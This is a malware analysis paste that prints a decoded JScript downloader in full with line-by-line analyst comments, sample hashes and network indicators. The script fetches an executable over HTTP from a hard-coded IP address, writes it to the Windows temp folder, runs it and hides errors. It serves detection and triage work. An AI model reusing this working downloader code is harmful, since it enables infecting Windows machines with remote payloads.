guelfoweb

VALORE LEGALE 10-17-2017.js

Oct 17th, 2017
  1. Encoded file: https://www.reverse.it/sample/35516855e1ca3a638afa09af0e0771d6eff3a91ec8d01899c8840d397ceed501
  2.  
  3. VirusTotal: https://www.virustotal.com/#/file/35516855e1ca3a638afa09af0e0771d6eff3a91ec8d01899c8840d397ceed501/detection
  4.  
  5. Decoded script:
  6.  
  // Analyst annotations: comments added for review; the decoded sample itself is unchanged.
  // Behaviour visible below: a JScript downloader that relies on Windows ActiveX objects
  // (typically run by Windows Script Host). It requests one file over plain HTTP from a
  // hard-coded IP address, writes the response to %TEMP% under a random numeric name ending
  // in .exe, and launches it. Both try/catch blocks discard errors, so a failed download or
  // launch produces no visible message.
  // Triage and detection points: a script host process making an outbound HTTP GET to a bare
  // IP address; a new <digits>.exe created in %TEMP% by that process; the same file then
  // started as its child process.
  // Indicators on this page: the sample SHA-256 in the links above, and the IP and path on line 29.
  7. var ws = new ActiveXObject("WScript.Shell"); // WScript.Shell: used below for environment expansion and process launch
  8. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe"; // drop path = %TEMP% + backslash (char code 92) + random integer 0..100000000 + ".exe"
  9. var dn = 0; // set to 1 once a payload is accepted; never read in the visible script
  10. var xo = new ActiveXObject("MSXML2.XMLHTTP"); // HTTP client object used for the download
  11. xo.onreadystatechange = function() { // handler assigned for request state changes
  12.     if (xo.readyState == 4 && xo.status == 200) { // act only on a completed request (readyState 4) with HTTP 200
  13.         var xa = new ActiveXObject("ADODB.Stream"); // stream object used to write the response bytes to disk
  14.         xa.open();
  15.         xa.type = 1; // 1 = binary stream (adTypeBinary)
  16.         xa.write(xo.ResponseBody); // raw response bytes copied into the stream
  17.         if (xa.size > 5000) { // responses of 5000 bytes or fewer are ignored; presumably to skip error pages (inferred)
  18.             dn = 1;
  19.             xa.position = 0; // rewind the stream before saving
  20.             xa.saveToFile(fn, 2); // 2 = overwrite if the file already exists (adSaveCreateOverWrite)
  21.             try {
  22.                 ws.Run(fn, 1, 0); // starts the dropped file: window style 1, wait flag 0 (does not wait for exit)
  23.             } catch (er) {}; // launch errors are discarded
  24.         };
  25.         xa.close();
  26.     };
  27. };
  28. try {
  29.     xo.open("GET", "http://89.45.67.144/onore.exe", false); // third argument false = synchronous request; hard-coded IP and path are the network indicators
  30.     xo.send();
  31. } catch (er) {}; // request errors are discarded